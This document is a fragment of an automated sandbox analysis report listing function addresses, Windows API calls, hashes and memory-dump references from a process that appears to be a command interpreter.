                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8132b6dd298b11a67795e99f25d12150032dd8e55f3d2fde5ca3e547ce089daf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B011976A41218BBDF21DBD5DC49FEEBBF8EB94750F100566EA02A2144D370AA42DA50
                                                                                                                                                                                                                          Function 001981EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 00198203
                                                                                                                                                                                                                          • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 0019820E
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 00198229
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0AB
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0C1
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001AB0D5
                                                                                                                                                                                                                          • fflush.MSVCRT ref: 001AB0E3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271573189-0
                                                                                                                                                                                                                          • Opcode ID: ab8cdbeb6ea4260e1d814b16d42835578dc1bd591a1df47ebb7a5f326f3c480a
                                                                                                                                                                                                                          • Instruction ID: 66f1a63a03c1ad12d620ab4bacc1a5c6b1f277ea19412f33307918898d13de04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab8cdbeb6ea4260e1d814b16d42835578dc1bd591a1df47ebb7a5f326f3c480a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A01A230107210FFDB00ABA8ED0EEDA7BACAF06315F500246F421925F1CBB54680DB62
                                                                                                                                                                                                                          Function 001A3CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A3D30
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 001A3E3D
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 001A3E88
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$FullNamePath
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3158150540-0
                                                                                                                                                                                                                          • Opcode ID: 2e9e48552ac3bdcfcb16ee19bb073dc33e7f582c66b3b9dc88d0f080100bc79a
                                                                                                                                                                                                                          • Instruction ID: 1bd42cf8aba6d544506897a59875f681cefc1180e3d56a4f091cfb75eac8e07d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9e48552ac3bdcfcb16ee19bb073dc33e7f582c66b3b9dc88d0f080100bc79a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6802C439A011159BCB29DFA8DC957B9B3B1FF49310F1881EDE80A97294D734AE82CF50
                                                                                                                                                                                                                          Function 0019498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A858D
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A8595
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 001A85D4
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A85ED
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A85F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1066134489-0
                                                                                                                                                                                                                          • Opcode ID: b021ec55864aa2685786547b78c4dc1bb08781c98c8172de68e9d8ad68d61875
                                                                                                                                                                                                                          • Instruction ID: 003850e72884f045a768e4464c219fbe0d9f108ff8ae82fc5b9d83eb906fb93d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b021ec55864aa2685786547b78c4dc1bb08781c98c8172de68e9d8ad68d61875
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3341D175E002109BDF28EF78D989AAEB3A5EF55308F14456AEC06DB185EF70DD41CA50
                                                                                                                                                                                                                          Function 0019B7A8 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _tell.MSVCRT ref: 0019B7F9
                                                                                                                                                                                                                          • _close.MSVCRT ref: 0019B82C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019B8CC
                                                                                                                                                                                                                          • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0019B936
                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 0019B947
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0019B96D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1380661413-0
                                                                                                                                                                                                                          • Opcode ID: 74d8db952cd2193627f4cd175784698d115aca14c3a07ff537719c9adda1a264
                                                                                                                                                                                                                          • Instruction ID: 82266e1a4b968af799066df4a2f6b4b2ccc118284fb51e240f93fb1dae808458
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74d8db952cd2193627f4cd175784698d115aca14c3a07ff537719c9adda1a264
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB4126709093008FDF34DF68E98872ABBE6BF95314F14092DE895976A0E734DC85CB92
                                                                                                                                                                                                                          Function 00197F47 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197F7C
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00197FC0
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00197FF3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 0019800C
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 001AB05A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveInformationTypeVolume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 285405857-0
                                                                                                                                                                                                                          • Opcode ID: 35d53826b8d32b5b009320391ae0c477e95a5a85ba141a326a16bf8a188cbefe
                                                                                                                                                                                                                          • Instruction ID: 42e013a62ec618cd8b1625b76fdf34dfc772a830a8b3bc3b65144ffc763896ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35d53826b8d32b5b009320391ae0c477e95a5a85ba141a326a16bf8a188cbefe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D318E72A01249ABDF24DFA4DC84AEF77B8FF0A344F04056AF401E2150DB38DA84CB21
                                                                                                                                                                                                                          Function 0019998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,001D0AF0,00000002,?,?,001AA669,%s %s ,?,?,00000000), ref: 001999DC
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001999EC
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001AA669,%s %s ,?,?,00000000), ref: 001999F4
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 00199A09
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4057327938-0
                                                                                                                                                                                                                          • Opcode ID: f1674ca1d5c28839f953c6318fd3395f97a897707124fb0266f1afa4722acd2c
                                                                                                                                                                                                                          • Instruction ID: b7592af8f38ac698b7dddbae90aed8fa4dc2e35a41e541df6356651055cdf9d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1674ca1d5c28839f953c6318fd3395f97a897707124fb0266f1afa4722acd2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21E73A745311ABDB28ABB95D8AB7A2358DF55755F25003FF606D62C1EFA0CC0181A1
                                                                                                                                                                                                                          Function 00199B3B Relevance: 9.1, APIs: 6, Instructions: 88fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001D0AF0,?,?,00000000), ref: 001AC0BC
                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,00001000,001CA7F0,00002000,00000000,00000000,001D0AEE), ref: 001AC0DC
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,00000000,?,00000000), ref: 001AC0FA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3249344982-0
                                                                                                                                                                                                                          • Opcode ID: 3967bda32c0ec1ef592cdfa3025e134ea58b87c54ddb6b67bd095e7f3eeddda4
                                                                                                                                                                                                                          • Instruction ID: 46c6412c817f4bafc7e01e17c50d71587edeb6df320026fd15d9a3b833ec7bef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3967bda32c0ec1ef592cdfa3025e134ea58b87c54ddb6b67bd095e7f3eeddda4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221A171A42205BFEF208F68AC49F7B7B7DEB04750F504029F902E2190E7749D40C761
                                                                                                                                                                                                                          Function 001B7540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001B75AC
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001B75CB
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001B75F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$iswspace
                                                                                                                                                                                                                          • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                          • API String ID: 3924973218-4129271751
                                                                                                                                                                                                                          • Opcode ID: 1a615f488e3ee597f4445c9ebd15cf002357589867c88ef31508b6109eb03b1e
                                                                                                                                                                                                                          • Instruction ID: 68942589de121d65316804f2c7b1c61f709beff2509fd8001877dd3e046d5a83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a615f488e3ee597f4445c9ebd15cf002357589867c88ef31508b6109eb03b1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1117F3160D701ABE739A729EC8ACF773A8FFD4720365402FF506960C0EFA05A8182A5
                                                                                                                                                                                                                          Function 0019DD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0019DDD6
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000001), ref: 0019DDE5
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0019DDF0
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019DDF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                          • Opcode ID: 62c880a7190024a0c95d2685ff632b6e21b6cf093608898045a64058509a6b39
                                                                                                                                                                                                                          • Instruction ID: b19c63e12885147cb2321f2d91cfdceacae7c26f2612ae9352e5e6b364a0f03a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62c880a7190024a0c95d2685ff632b6e21b6cf093608898045a64058509a6b39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C110633C05214ABDF1187F8BD4CB7A3BE8EB46368F250616E815E28E0D7348D418A91
                                                                                                                                                                                                                          Function 00199A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                          • Opcode ID: d03c4ca9ad2a3177cf0222c0871016028257cc289e7f116f2ac424673708c0b9
                                                                                                                                                                                                                          • Instruction ID: c8b2c99ed7f8d052ed02a28d2b2d7c654c7355cfda8eae0617dbf8a51a0171de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d03c4ca9ad2a3177cf0222c0871016028257cc289e7f116f2ac424673708c0b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 470186338060206B8E21977D9D4DD7E3B6CDB86775B65032AF837E35D0DB348D429592
                                                                                                                                                                                                                          Function 0019DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001AD954
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A70,000000FF,00000000,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD96D
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00002000,00000000,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD987
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A70,000000FF,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD9D3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
